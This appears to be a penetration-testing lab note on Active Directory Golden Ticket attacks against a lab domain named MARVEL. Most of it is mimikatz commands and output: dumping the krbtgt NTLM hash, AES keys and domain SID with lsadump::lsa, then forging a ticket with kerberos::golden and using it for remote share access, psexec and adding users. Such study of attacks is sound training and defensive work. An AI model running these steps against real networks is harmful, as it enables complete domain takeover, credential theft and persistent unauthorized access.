Golden Ticket Attacks
Golden Ticket Attacks
What is it?
When we compromise the krbtgt account, we own the domain
We can request access to any resource or system on the domain
Golden tickets == complete access to every machine
Requirements to do the Golden Ticket Attack
We need information about krbtgt account.
NTLM Hash
Domain SID
C:\Users\Administrator>C:\Users\Administrator\Downloads\mimikatz_trunk\x64\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : MARVEL / S-1-5-21-817282392-3664699690-768258319
RID : 000001f6 (502)
User : krbtgt
* Primary
NTLM : e2862946500528c91a1bc952806f1f6d
LM :
Hash NTLM: e2862946500528c91a1bc952806f1f6d
ntlm- 0: e2862946500528c91a1bc952806f1f6d
lm - 0: ab0c4fe79d001397eeaeabec8c6a65dc
* WDigest
01 50bdc43e530f2785fd2ddbf04232f0b0
02 d2c47afcdd3f4f124bc3cab78d6a097f
03 f0754118189d06b4ced69310a6e86b98
04 50bdc43e530f2785fd2ddbf04232f0b0
05 d2c47afcdd3f4f124bc3cab78d6a097f
06 66c6e7d86e2bb2676cda3483d65bd620
07 50bdc43e530f2785fd2ddbf04232f0b0
08 88e6ccda878ff94edbe7a95183bdfedd
09 184cf6c89733fa8b1f0c4b254207d902
10 ac06c941454b764424db46790116043d
11 5707a0bb4b9450028f658ec8ed6b0a96
12 184cf6c89733fa8b1f0c4b254207d902
13 4f1f90dad2001598251781bec3317df7
14 5707a0bb4b9450028f658ec8ed6b0a96
15 1bbfd030822063491df4bf7bbe17b486
16 6b2625f78b64c1eb51db6465f15cff56
17 efd3a9c79d4cf5ef5a4f9a1adc6a671f
18 9e0ba9b60058f03c4f830917f0168188
19 b524ae6efcdc086d7f1b6be1ff68c57c
20 42b0da52d6ad34f66d2af3bfdcf89714
21 96a3f7431741bb58364a45bf1f415291
22 96a3f7431741bb58364a45bf1f415291
23 b921d7d19b70d3f123c65d903f42201f
24 65157e48b9f3f56bc02c11767eac7b12
25 99babae319fe5ad6d2b5ecd2e6e07030
26 5e84ed4dc6c0440fc9fd2704a1060728
27 e4b5fd2d9116fc0b81b7c275a7f31ed0
28 b53347649d3d182947254b3d518cb367
29 f041d125177de79a9f640b001fd72350
* Kerberos
Default Salt : MARVEL.LOCALkrbtgt
Credentials
des_cbc_md5 : d391ecb5dc9e9ec7
* Kerberos-Newer-Keys
Default Salt : MARVEL.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 0c6a01772449ba5a73b3e9c142c0059c060cfcafa48867b8493d861917f49ff9
aes128_hmac (4096) : dec56d737b6bab7c96a7d8ce326d57f6
des_cbc_md5 (4096) : d391ecb5dc9e9ec7
* NTLM-Strong-NTOWF
Random Value : 054bbf8dc2887cde3f761892508cb6ccWe need the SID of the domain
S-1-5-21-817282392-3664699690-768258319We need the NTLM hash of the account
e2862946500528c91a1bc952806f1f6d
Generate a golden ticket
kerberos::golden /User:Admin /domain:marvel.local /sid:S-1-5-21-817282392-3664699690-768258319 /krbtgt:e2862946500528c91a1bc952806f1f6d /id:500
Pass the Golden Ticket
Once we have the ticket we can pass this ticket and can have command line access to every machine.
misc::cmd
dir \\THEPUNISHER\C$We can also run command prompt with psexec.
We can also add a new user.
Last updated